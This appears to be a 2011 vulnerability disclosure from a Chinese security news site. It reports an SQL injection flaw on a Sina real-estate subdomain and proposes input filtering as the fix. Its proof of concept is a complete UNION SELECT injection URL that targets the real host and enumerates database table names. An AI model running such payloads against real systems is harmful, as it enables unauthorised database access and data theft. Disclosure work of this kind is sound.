资讯 安全 论坛 下载 读书 程序开发 数据库 系统 网络 电子书 微信学院 站长学院 QQ 考试
频道栏目
系统安全| 网站安全| 企业安全| 网络安全| 工具软件| 杀毒防毒| 加密解密|
登录注册
首页 > 安全 > 网站安全 > 正文

新浪房产分站存在SQL注入漏洞及修复

2011-01-12 10:56:55      个评论      
收藏   我要投稿
详细说明:新浪房产分站存在MySQL注入漏洞
漏洞证明:http://supports.house.sina.com.cn/decor/brand/brand.php?bid=17%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20information_schema.tables%20where%20table_schema=0x737570706F727473686F757365%20limit%20132,1--
修复方案:过滤
点击复制链接 与好友分享!回本站首页
相关TAG标签 新浪 漏洞 分站 房产
上一篇:Awstats统计权限分配不当导致爆路径及修复
下一篇:TinyBB 1.2 SQL Injection Vulnerability
相关文章
新浪招聘 不能说的秘密(跨站脚本攻击)
新浪某频道XSS漏洞及修复
新浪的URL跳转漏洞及修复方案
新浪VIP读书频道XSS及修复
新浪彩票站注入漏洞及修复
新浪博客CSRF漏洞及修复
新浪存在xss导致用户账号被劫持及修复
新浪微博的重大安全漏洞,可能导致微博
新浪WAP下载频道SQL注射及修复
新浪游戏台湾分站SQL注入
热门专题推荐 md5 解密 杀毒软件 个人电脑安全 脱壳破解 u盘启动工具 小马激活工具 office激活 word win7激活工具
图文推荐
文章
推荐
热门新闻
· NSA泄露黑客工具之 FuzzBunch & Da
· 3个小妙招有效防止服务器遭受DDoS攻击
· 这13招教你成为优秀的白帽黑客
· NSA泄露工具中的Dander Spiritz工具使
· 如何获取电信(光)猫路由器超级帐号密
· PHPCMS v9.6.0 任意文件上传漏洞分析
· 照着这么做,谁都别想偷走你电脑里的文
· 2017年5月4日被黑网站曝光

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站